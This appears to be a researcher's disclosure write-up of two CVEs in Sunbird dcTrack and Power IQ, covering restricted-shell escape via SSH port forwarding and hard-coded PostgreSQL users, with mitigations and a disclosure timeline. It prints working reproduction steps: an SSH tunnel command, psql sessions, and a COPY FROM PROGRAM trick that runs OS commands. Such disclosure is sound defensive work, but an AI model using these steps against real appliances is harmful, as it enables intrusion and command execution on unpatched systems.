CVE-2025-66238 and CVE-2025-66237
CVE-2025-66238 and CVE-2025-66237
CISA ICS Advisory
Summary
The DCIM dcTrack platform is affected by two vulnerabilities that allow an authenticated user to escape its restricted SSH shell. The first is a misconfiguration that permits SSH port forwarding, enabling access to internal services that should not be reachable. The second is the presence of hard-coded credentials for the platform’s internal PostgreSQL database. Together, these issues allow a restricted user to break out of the limited shell environment and execute arbitrary commands on the underlying system.
Versions Impacted
The products affected are :
| Vendor | Product | Version Impacted |
|---|---|---|
| Sunbird | DCIM dcTrack | < 9.2.3 |
| Sunbird | Power IQ | < 9.2.1 |
Vulnerability Details
CVE-2025-66238
The restricted shell that the platforms concerned expose over SSH is intended to limit users and administrators to a narrow and controlled command set. However, SSH port forwarding is not disabled for these accounts. As a result, an authenticated user or administrator can establish local or remote port-forwarding tunnels to services bound only to the host’s internal interfaces.
This vulnerability can be reproduced using an ssh client to connect to the target Sunbird DCIM dcTrack server and port forward to the local Postgres database using the example command :
ssh config@TARGET_IP -L 5432:localhost:5432
CVE-2025-66237
The platform embeds hard-coded credentials for its internal PostgreSQL instance. When combined with SSH port forwarding (CVE-2025-XXXX), an authenticated restricted-shell user can connect directly to this database from their local machine.
Multiple database users (odbcuser, raritan and dctrack) used by the platform use default and hard coded credentials for access.
Because the PostgreSQL configuration permits execution pathways that reach the underlying operating system, this access can be leveraged to escape the restricted shell and execute arbitrary commands on the host.
This vulnerability can be reproduced using a Postgres database client using the following parameters :
Port : tcp/5432
Database Name : raritan
Database Users :
odbcuser
raritan
dctrack
Impact :
By exploiting CVE-2025-66238, an attacker can leverage SSH port forwarding to reach backend services on local TCP sockets, escape the restricted shell, and gain access to the platform’s internal PostgreSQL database for privilege escalation.
As an example, the following internal services used by the platform can now be accessed :
tcp 0 0 127.0.0.1:4949 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 1246/postmaster
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::5432 :::* LISTEN 1246/postmaster
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::8161 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::36463 :::* LISTEN -
tcp6 0 0 :::61616 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
With CVE-2025-66237, an attacker who obtains the hard‑coded PostgreSQL credentials can take full control of the database, escalate privileges on the platform, and ultimately execute system commands on the host.
This can be be used to access the database that is used to store configurations, data and authentication details for the platform :
$ psql -h 127.0.0.1 -U raritan raritan
psql (14.15 (Ubuntu 14.15-0ubuntu0.22.04.1), server 12.9)
Type "help" for help.
raritan=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
postgres | postgres | UTF8 | C | C |
raritan | raritan | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
raritan=# \c raritan
psql (14.15 (Ubuntu 14.15-0ubuntu0.22.04.1), server 12.9)
You are now connected to database "raritan" as user "raritan".
raritan=# SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';
table_name
-----------------------------------------------------------
audit_log_cursors
audit_logs
batch_job_execution
batch_job_execution_context
batch_job_execution_params
batch_job_instance
batch_step_execution
configuratr_settings
cron_task_schedules
dashboardr_poweriq_credentials
databasechangelog
databasechangeloglock
dct_model_aliases
rails_options
rails_options_old
rbac_items
rbac_lks
rbac_objects
rbac_permissions
rbac_role_privileges
rbac_roles
roles
roles_user_groups
roles_users
saml_configurations
user_group_members
user_groups
user_prefs
users
[TRIMMED_OUTPUT]
(293 rows)
Additionally, system commands can be run on the host OS (thus bypassing restricted shell access to platform owners) using techniques such as :
CREATE table temp(t text);
copy temp from program 'ps -aux'
select * from temp limit 1000 offset 0 ;
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 238644 6812 ? Ss Jan30 1:48 /usr/lib/systemd/systemd --switched-root --system --deserialize 16
root 2 0.0 0.0 0 0 ? S Jan30 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< Jan30 0:00 [rcu_gp]
root 1056 0.1 0.1 374312 8532 ? Ss Jan30 17:37 /usr/bin/perl -w /usr/local/sbin/hc.pl
nginx 1059 0.0 0.7 589920 61780 ? Sl Jan30 1:09 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
nginx 1060 0.0 0.7 589924 61884 ? Sl Jan30 1:08 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
nginx 1061 0.0 0.7 589952 61276 ? Sl Jan30 1:08 /opt/sunbird/appliance_manager/vendor/bundle/ruby/3.1.0/bin/rake qc:work
config 1407704 0.0 0.0 235960 5184 pts/0 Ss+ 16:19 0:00 /usr/bin/perl -w /usr/local/sbin/config.pl
root 1407706 0.0 0.0 337252 7744 pts/0 S+ 16:19 0:00 /usr/bin/sudo /usr/local/sbin/serial-config.pl /var/log/oculan/serial-config.log
root 1407707 0.0 0.4 327936 37284 pts/0 S+ 16:19 0:00 /usr/bin/perl -w /usr/local/sbin/serial-config.pl /var/log/oculan/serial-config.log
postgres 1407812 0.0 0.1 1426564 12292 ? Ss 16:19 0:00 postgres: dctrack raritan 127.0.0.1(38636) idle
postgres 1407814 0.0 0.2 1428104 23220 ? Ss 16:19 0:00 postgres: raritan raritan 127.0.0.1(40498) idle
postgres 1408621 0.0 0.0 262548 3940 ? R 16:29 0:00 ps -aux
[TRIMMED_OUTPUT]
Recommended Mitigations
As CISA recommends (in ICSA-25-338-05), administrators of these platforms are urged to take defensive measures to minimize the risk of exploitation of this vulnerability, such as :
- Restrict network access to administrative services for these platforms over SSH.
- Rotate the default SSH passwords for the administrative user
config. - Update to the versions : 9.2.3 (dcTrack) and 9.2.1 (Power IQ)
Disclosure Timeline
| Feb 16, 2025 | Case opened with CERT Coordination Center (CERT/CC). |
| Feb 25, 2025 | CISA ICS coordinator assigned. |
| Feb 26, 2025 | Sunbird Software join Case. |
| Dec 4, 2025 | CISA ICS publishes ICSA-25-338-05 |
| Dec 4, 2025 | Responsible public disclosure of details. |
Acknowledgements
A shout out to the Technical Editors and Writers at CISA Industrial Control Systems Vulnerability Management and Coordination, as well as the engineers at Sunbird Software, for being prompt on their communications, and their assistance on disclosing the issue.